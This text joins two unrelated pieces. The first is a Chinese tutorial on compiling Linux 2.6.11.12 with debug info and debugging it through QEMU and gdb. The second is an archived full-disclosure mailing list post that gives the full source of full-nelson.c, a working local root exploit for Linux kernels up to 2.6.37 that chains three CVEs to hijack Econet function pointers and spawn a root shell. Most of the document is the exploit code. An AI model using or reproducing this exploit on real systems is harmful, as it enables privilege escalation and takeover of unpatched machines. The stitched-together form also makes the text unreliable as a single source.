linux内核调试环境的搭建(使用qemu)

这里说明下，本人调试的内核版本是2.6.11.12，为什么去调试这么“古老”的版本？原因不多说了，你手头也许正拿着ULK3，而它针对的内核版本正是2.6.11，有比这更好的理由吗？而且这个版本不算旧，已不算新，我认为还算不错，想想当下还有如此多的人在学习0.11的道路上笃定的前行，讨论关于版本的事情，真的没什么意义。只要你认为有用，能学到东西，做什么别人都不会说你错！

接下来，我尽量把我碰到的一些棘手或者关键的地方都交代清楚，希望看到这篇文章的朋友能顺利搭建好自己的环境。good luck！

你手头需要有VMware，其他的虚拟化工具就不谈了，用法差不多。在vmware中，我先后使用Ubuntu 12.04和CentOS 5.1来编译内核，结果都是失败！后来google查到原因是这些发布版的gcc太高，而当时在低版本下编译成的2.6.11内核在这些版本下编译会报错，无法正常编译。不过有不少人说可以将gcc降版本。。。，虽然不是不可行，但是考虑操作可能会比较麻烦等原因，这个方案选择放弃！

后来得知(通过goole)，能天然编译2.6.11的发布版，有两种，分别是ubuntu 5.1和RedHat 9.0，他们的内核版本都是2.6.11或者相近的版本。最后我选择了ubuntu，原因就不说了，都懂的！

我用ubuntu的毛病就是，刚安装的系统，首先做的事情就是更新source.list文件，后来查到ubuntu已经不再对5.1及一些版本做支持了，所以我用了网上搜到的最新的source.list在升级的时候遇到各种报错，恶心的要死。

所以我的建议就是不要动source.list，用默认的就可以了。

www.linuxidc.com @localhost:~$ sudo apt-get install build-essential

接下来来要做的第一件事就是安装build-essential，这个东西是重要的c语言开发包，包含了gcc, make, gdb和libc函数库等很多工具，编译c程序所必须的一些东西，因为刚安装完的ubuntu 5.1基本上是个废品，gcc根本不能用。

然后我的习惯是给系统安装ssh，因为安装完ssh之后，我就可以用xshell和xftp来实现更方便的操作，当然很多人喜欢安装VMware Tools。
关于如何使用xshell和xftp，就不多讲了，反正作用就是为了方便在主机和虚拟机之间传输数据，什么方式都可以。
接下来就是安装qemu，如果能使用更新的source.list，就可以直接在终端使用sodu apt-get install qemu来完成安装，但是系统默认的更新源是没有这个包的，所以选择使用源码安装。

选择哪个版本？我曾经选择过最新的版本，首先编译比较慢，而且编译之后的可执行文件没有“qemu”，而是一些qemu-i386，qemu-mips等等。我开始以为qemu-i386是我想要的，但是用了一些网上讲的使用方法，貌似不行。不想浪费时间研究了，决定换低的版本试一试。
从最开始的0.10到0.91编译都有各种报错，最突出的问题是，这些版本编译要求系统的gcc是3.x，而当前系统的gcc是4.0.2 20050808，跪了！后来试了很多，最终选择了0.11.0-rc2，即内部版本为0.11.92，其他的有些版本编译也会有很多错误，根本编译不过，有的说缺什么库，有的源码里就有编译错误，shit！反正这个版本是没有问题的，可以顺利编译。
关于如何找到这个版本，这里跟大家说下。

首先登陆官网：https://github.com/qemu/QEMU



单击这个branch:master后面的小三角，在Tags里面查找即可：



好了，qemu安装完(直接configure，make，make install)之后，我们就可以编译2.6.11.12内核了，关于内核编译，资料多如牛毛，我只使用两个命令：

www.linuxidc.com @localhost:~$make menuconfig
www.linuxidc.com @localhost:~$make -j4 bzImage

但是这里有几个问题要说一下，关于什么是make menuconfig，不知道的同学去google下，另外执行命令需要ncurses库的支持，不然你执行
make menuconfig会报错，这里大家可以去官网下:
http://ftp.gnu.org/pub/gnu/ncurses/
版本应该问题不大，我选择的是5.5的版本，因为我看到它的更新日期是2005年，而ubuntu 5.1也是在那个时间发布的，不会用什么兼容上的问题。

执行menuconfig的时候，我们唯一需要做的工作就是在Kernel hacking项目里面将Compile the kernel with debug info和Compile the kernel with frame pointers，两项勾选(在相应项上按空格键，里面都有详细的说明，不会的同学自己看)。这些项目可以让编译时添加调试信息，类似我们平时用的-g选项。

然后make -j4 bzImage，其中-j是让编译时使用多核心，你配置的cpu有几个核心就在后面加上几，比如我的配置的是四核心，那么就是-j4。

等一小会儿(机器快的话)之后，内核编译完成，激动吧。。。。
那么qemu如何使用呢？
直接终端输入：

www.linuxidc.com @localhost:~$qemu -s -S -kernle linux-2.6.11.12/arch/i386/boot/bzImage
参数说明：
-s: qemu在端口1234监听gdb的调试连接
-S: 让qemu启动后暂停，等待gdb的连接
-kernel: 指定bzImage的路径

由于我目前的关注重点是内核初始化的一些过程，所以更高级的qemu功能先暂时不去研究，后面用到再说。
之后我们另开启一个终端，在源码的顶层目录输入：

www.linuxidc.com @localhost:~/linux-2.6.11.12$ gdb vmlinux

然后，输入命令：

(gdb) target remote localhost:1234
Remote debugging using localhost:1234
[New Thread 1]
0x0000fff0 in ?? ()
warning: shared library handler failed to enable breakpoint
(gdb)

之后我们打个断点测试下：

(gdb) b start_kernel
Breakpoint 1 at 0xc030e537: file init/main.c, line 417.
(gdb) c
Continuing.

Breakpoint 1, start_kernel () at init/main.c:417
417 {
(gdb) n
425 page_address_init();
(gdb)

ok了！后面关于一些使用或者调试的心得，再来跟大家分享！

[prev in list] [next in list] [prev in thread] [next in thread]

List:       full-disclosure
Subject:    [Full-disclosure] Linux kernel exploit
From:       Dan Rosenberg <dan.j.rosenberg () gmail ! com>
Date:       2010-12-07 20:25:36
Message-ID: 1291753536.584.14.camel () dan
[Download message RAW]

Hi all,

I've included here a proof-of-concept local privilege escalation exploit
for Linux.  Please read the header for an explanation of what's going
on.  Without further ado, I present full-nelson.c:

Happy hacking,
Dan

--snip--

/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg
* @djrbliss on twitter
*
* Usage:
* gcc full-nelson.c -o full-nelson
* ./full-nelson
*
* This exploit leverages three vulnerabilities to get root, all of which were
* discovered by Nelson Elhage:
*
* CVE-2010-4258
* -------------
* This is the interesting one, and the reason I wrote this exploit.  If a
* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
* word will be written to a user-specified pointer when that thread exits.
* This write is done using put_user(), which ensures the provided destination
* resides in valid userspace by invoking access_ok().  However, Nelson
* discovered that when the kernel performs an address limit override via
* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
* etc.), this override is not reverted before calling put_user() in the exit
* path, allowing a user to write a NULL word to an arbitrary kernel address.
* Note that this issue requires an additional vulnerability to trigger.
*
* CVE-2010-3849
* -------------
* This is a NULL pointer dereference in the Econet protocol.  By itself, it's
* fairly benign as a local denial-of-service.  It's a perfect candidate to
* trigger the above issue, since it's reachable via sock_no_sendpage(), which
* subsequently calls sendmsg under KERNEL_DS.
*
* CVE-2010-3850
* -------------
* I wouldn't be able to reach the NULL pointer dereference and trigger the
* OOPS if users weren't able to assign Econet addresses to arbitrary
* interfaces due to a missing capabilities check.
*
* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
*  * The particular symbols I resolve are not exported on Slackware or Debian
*  * Red Hat does not support Econet by default
*  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
*    Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*
* NOTE: the exploit process will deadlock and stay in a zombie state after you
* exit your root shell because the Econet thread OOPSes while holding the
* Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
*
* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
*/

#include <stdio.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
#include <net/if.h>
#include <sched.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>

/* How many bytes should we clear in our
* function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;

f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}

repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}

fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release);
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

commit_creds(prepare_kernel_cred(0));
return -1;

}

/* Why do I do this?  Because on x86-64, the address of
* commit_creds and prepare_kernel_cred are loaded relative
* to rip, which means I can't just copy the above payload
* into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
asm("mov $getroot, %rax; call *%rax;");
#else
asm("mov $getroot, %eax; call *%eax;");
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
* via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
int ret;
struct ifreq ifr;

memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

if(ret < 0) {
printf("[*] Failed to set Econet address.\n");
return -1;
}

splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

/* Shouldn't get here... */
exit(0);
}

int main(int argc, char * argv[])
{
unsigned long econet_ops, econet_ioctl, target, landing;
int fildes[4], pid;
void * newstack, * payload;

/* Create file descriptors now so there are two
references to them after cloning...otherwise
the child will never return because it
deadlocks when trying to unlock various
mutexes after OOPSing */
pipe(fildes);
fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open("/dev/zero", O_RDONLY);

if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
printf("[*] Failed to open file descriptors.\n");
return -1;
}

/* Resolve addresses of relevant symbols */
printf("[*] Resolving kernel addresses...\n");
econet_ioctl = get_kernel_sym("econet_ioctl");
econet_ops = get_kernel_sym("econet_ops");
commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
printf("[*] Failed to resolve kernel symbols.\n");
return -1;
}

if(!(newstack = malloc(65536))) {
printf("[*] Failed to allocate memory.\n");
return -1;
}

printf("[*] Calculating target...\n");
target = econet_ops + 10 * sizeof(void *) - OFFSET;

/* Clear the higher bits */
landing = econet_ioctl << SHIFT >> SHIFT;

payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

if ((long)payload == -1) {
printf("[*] Failed to mmap() at target address.\n");
return -1;
}

memcpy((void *)landing, &trampoline, 1024);

clone((int (*)(void *))trigger,
(void *)((unsigned long)newstack + 65536),
CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
&fildes, NULL, NULL, target);

sleep(1);

printf("[*] Triggering payload...\n");
ioctl(fildes[2], 0, NULL);

if(getuid()) {
printf("[*] Exploit failed to get root.\n");
return -1;
}

printf("[*] Got root!\n");
execl("/bin/sh", "/bin/sh", NULL);
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure |
About | News |
Add a list | Sponsored by KoreLogic